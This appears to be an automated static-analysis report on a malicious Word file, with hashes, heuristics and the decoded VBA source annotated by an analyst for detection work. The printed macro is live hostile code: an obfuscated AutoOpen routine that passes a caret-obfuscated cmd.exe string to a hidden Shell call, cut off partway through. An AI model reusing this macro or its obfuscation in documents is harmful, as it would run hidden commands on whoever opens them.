Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 060659d9f4fc3dd1…

MALICIOUS

Office (OLE)

88.1 KB Created: 2018-09-21 07:50:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 129aaf254a4941b5204347677f28494f SHA-1: 8d771cfdeca7955e21e781f323bed819497d72f5 SHA-256: 060659d9f4fc3dd1a9590a7a254974c2f53fd366fbdd46f15c6ecee9f04354b6
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Word document containing a legacy WordBasic AutoOpen macro. The AutoOpen macro is obfuscated and likely intended to download and execute a secondary payload. The presence of the AutoOpen macro and the VBA macros strongly suggests a spearphishing attachment attack vector.

Heuristics 4

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7584 bytes
SHA-256: 15b0d265b3b649fa21c1dd2d708b1e8e70fc26339791a7994784626d3f675080
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "IYmBjDjzCYKM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba: this is the document module
' (VB_Base "1Normal.ThisDocument", VB_PredeclaredId True), which is where
' Word looks for the AutoOpen auto-exec procedure defined below. The random
' module name is consistent with the generated, obfuscated style of the rest
' of the source.
Sub AutoOpen()
' Auto-exec entry point: Word runs AutoOpen when the document is opened,
' so no user interaction beyond enabling macros is needed.
'
' Almost every statement in this procedure builds a local array from
' Left/Right/Mid/MidB calls on identifiers (oRUYuz, EfAoiq, USZUool, ...)
' that are never declared or assigned anywhere in the recovered source.
' There is no Option Explicit, so those reads presumably evaluate as Empty
' and the arrays fill with "" and are discarded — dead-code padding whose
' only purpose is to bury the single effective statement (the VzjhJzBTBo
' call below) and to inflate the module. TODO confirm none of the missing
' identifiers are defined in a module outside the visible 1,000-line preview.
   Dim YOXziw()
ReDim YOXziw(5)
YOXziw(0) = "ihvHrcP"
YOXziw(1) = Right(oRUYuz, 136)
YOXziw(2) = "io"
YOXziw(3) = MidB(EfAoiq, 526, 514)
YOXziw(4) = Right(USZUool, 364)

   Dim TakjC()
ReDim TakjC(3)
TakjC(0) = MidB(noEwRIsK, 259, 831)
TakjC(1) = Mid(hsRQQCjD, 424, 858)
TakjC(2) = Left(jGNoH, 323)

   Dim mDaYG()
ReDim mDaYG(2)
mDaYG(0) = Mid(pYDkNTA, 906, 416)
mDaYG(1) = Mid(DAErN, 162, 243)

   Dim Xvkzb()
ReDim Xvkzb(4)
Xvkzb(0) = Left(taPrwd, 870)
Xvkzb(1) = MidB(LKOZTTX, 304, 403)
Xvkzb(2) = "qDzYr"
Xvkzb(3) = MidB(KzaoZzTa, 121, 660)

   Dim wztqC()
ReDim wztqC(3)
wztqC(0) = Left(bRLZOH, 943)
wztqC(1) = Right(DZhwCXEd, 632)
wztqC(2) = Mid(nEwkd, 28, 542)

' The one statement that does anything. It concatenates four pieces into a
' command string and hands it to VzjhJzBTBo, which passes it to Shell:
'   - KeyString(4 + 2 + 3 + 12 + 46) = KeyString(67): Word's
'     Application.KeyString returns the key name for a key code; 67 is the
'     "C" key, so this is presumably a single letter — NOTE(review): confirm.
'   - hDCrGY(): defined in the second module; the visible part of it builds
'     a caret-obfuscated "md /V:ON/C ..." fragment, so the leading KeyString
'     result looks like the missing first character of a cmd.exe invocation
'     with delayed variable expansion (/V:ON) — confirm in an instrumented run.
'   - mkZtSmaPbIVvH and JXRVjbjzDE: not present in the visible preview.
' The arithmetic on constants and the split across four functions are the
' obfuscation; a detection should key on the Shell sink rather than on any
' of these fragments.
VzjhJzBTBo (KeyString(4 + 2 + 3 + 12 + 46) + hDCrGY + mkZtSmaPbIVvH + JXRVjbjzDE)
' Everything below is more of the same discarded padding.
   Dim qoTlK()
ReDim qoTlK(4)
qoTlK(0) = Mid(bijQJf, 729, 317)
qoTlK(1) = "ioFtSZz"
qoTlK(2) = MidB(iRnOMF, 698, 422)
qoTlK(3) = "FajbIWKVjrns"

   Dim jSDwLw()
ReDim jSDwLw(2)
jSDwLw(0) = Mid(umrXk, 389, 441)
jSDwLw(1) = MidB(OdwuT, 487, 217)

   Dim sUaFw()
ReDim sUaFw(4)
sUaFw(0) = Left(zLVdz, 484)
sUaFw(1) = Left(kKasWlFB, 745)
sUaFw(2) = Mid(DwKmcrwB, 712, 361)
sUaFw(3) = Left(bAwTT, 610)

   Dim aRuYmi()
ReDim aRuYmi(5)
aRuYmi(0) = Mid(XTfEv, 179, 141)
aRuYmi(1) = MidB(XiLosD, 454, 52)
aRuYmi(2) = Right(KROrwuMX, 729)
aRuYmi(3) = "Yt"
aRuYmi(4) = Left(mIEfA, 332)

   Dim PFVWX()
ReDim PFVWX(3)
PFVWX(0) = MidB(OWouCPGN, 406, 379)
PFVWX(1) = Left(ZYSjJD, 673)
PFVWX(2) = Mid(TrDkMDG, 261, 413)

End Sub
Function VzjhJzBTBo(rYVuOdJt As String)
' Execution sink. rYVuOdJt is the command string assembled in AutoOpen;
' the only effective statement here is the Shell call in the middle of the
' body. No value is assigned to the function name, so it returns Empty.
' As in AutoOpen, the Dim/ReDim blocks around the call operate on undeclared
' identifiers and are discarded padding.
   Dim CWSQz()
ReDim CWSQz(5)
CWSQz(0) = Mid(cOrjp, 183, 112)
CWSQz(1) = Mid(XHnOVUZ, 545, 237)
CWSQz(2) = Right(dJKcY, 52)
CWSQz(3) = Mid(tJZoj, 609, 902)
CWSQz(4) = "aOhKBdAVWbM"

   Dim rYnZK()
ReDim rYnZK(4)
rYnZK(0) = Right(mqrzp, 776)
rYnZK(1) = "wAjpqbsav"
rYnZK(2) = MidB(rRLcd, 770, 764)
rYnZK(3) = Left(LWoBl, 733)

' Runs the assembled command as a new process. The second argument is the
' Shell window style: msoBarTypeNormal is an Office enum constant whose
' value is 0, which is the same value as vbHide, so the child process
' presumably starts with no visible window — confirm in a sandbox. The "@"
' type-declaration suffix on Shell adds nothing functionally; it looks like
' tokenizer noise intended to defeat naive "Shell(" signature matching, so
' detection logic should normalize such suffixes before matching.
Shell@ rYVuOdJt, CInt(msoBarTypeNormal)
   Dim CjsowD()
ReDim CjsowD(3)
CjsowD(0) = MidB(wWliiY, 700, 836)
CjsowD(1) = Mid(IrDwA, 950, 608)
CjsowD(2) = Right(WpuuMzS, 851)

   Dim MVpwpr()
ReDim MVpwpr(4)
MVpwpr(0) = Right(UGRfAELU, 103)
MVpwpr(1) = Mid(ozzjFDI, 339, 127)
MVpwpr(2) = MidB(XjYTp, 36, 785)
MVpwpr(3) = Right(WQJCLJ, 608)

   Dim EWlia()
ReDim EWlia(3)
EWlia(0) = Left(SdshC, 137)
EWlia(1) = Mid(hhiiQk, 651, 970)
EWlia(2) = "wPnwoVmnpBOp"

   Dim IziPs()
ReDim IziPs(3)
IziPs(0) = "XhAphk"
IziPs(1) = Left(nqwSvHz, 670)
IziPs(2) = Right(BDwdR, 801)

   Dim uaTHk()
ReDim uaTHk(4)
uaTHk(0) = MidB(Mpzvnvd, 977, 120)
uaTHk(1) = Mid(aizFSq, 138, 454)
uaTHk(2) = MidB(wviROEh, 753, 720)
uaTHk(3) = "HQdDNjcwMLnjD"

End Function

' Start of a second, separately named module. It holds hDCrGY, the helper
' that supplies the command-string body consumed by AutoOpen in the first
' module; the extracted preview is truncated part-way through it.
Attribute VB_Name = "UazdGpwUlREjcT"
Function hDCrGY()
Dim vrZANi()
ReDim vrZANi(3)
vrZANi(0) = Left(svpsnZFP, 196)
vrZANi(1) = Mid(oRnnWtfm, 475, 845)
vrZANi(2) = MidB(zBbjOZQ, 596, 908)

   Dim GpMcMv()
ReDim GpMcMv(3)
GpMcMv(0) = Left(QwUjh, 859)
GpMcMv(1) = Right(foIquwhJ, 996)
GpMcMv(2) = "riOF"

   Dim jPNQiB()
ReDim jPNQiB(3)
jPNQiB(0) = MidB(zOhwN, 816, 385)
jPNQiB(1) = Right(zzwlaMUK, 567)
jPNQiB(2) = "Hj"

   Dim XUhUH()
ReDim XUhUH(5)
XUhUH(0) = Mid(mkdYijAb, 40, 863)
XUhUH(1) = Left(bfpzRm, 587)
XUhUH(2) = "zpwlhhFjmzOzYl"
XUhUH(3) = "CXMWUAIXLwL"
XUhUH(4) = Right(auOFiCWK, 68)

   Dim XQaovR()
ReDim XQaovR(3)
XQaovR(0) = Left(PlLuD, 591)
XQaovR(1) = Right(dPzlssH, 258)
XQaovR(2) = Left(VjOniIw, 975)

ClcHfp = "md /V:ON/C" + ChrW(5 + 0 + 5 + 4 + 20) + "^s^e^t ^p^" + "G=  ^ ^ " + "^ ^ ^   ^ ^ " + " ^ ^" + " ^ ^ ^" + " }}{^hc^" + "tac};^k^a^"
Dim DNLoRA()
ReDim DNLoRA(3)
DNLoRA(0) = Left(jMZwuf, 588)
DNLoRA(1) = Left(CdjdnYf, 108)
DNLoRA(2) = Mid(ALTSG, 491, 230)

   Dim rMEdFz()
ReDim rMEdFz(4)
rMEdFz(0) = MidB(PrhBmF, 129, 291)
rMEd
... (truncated)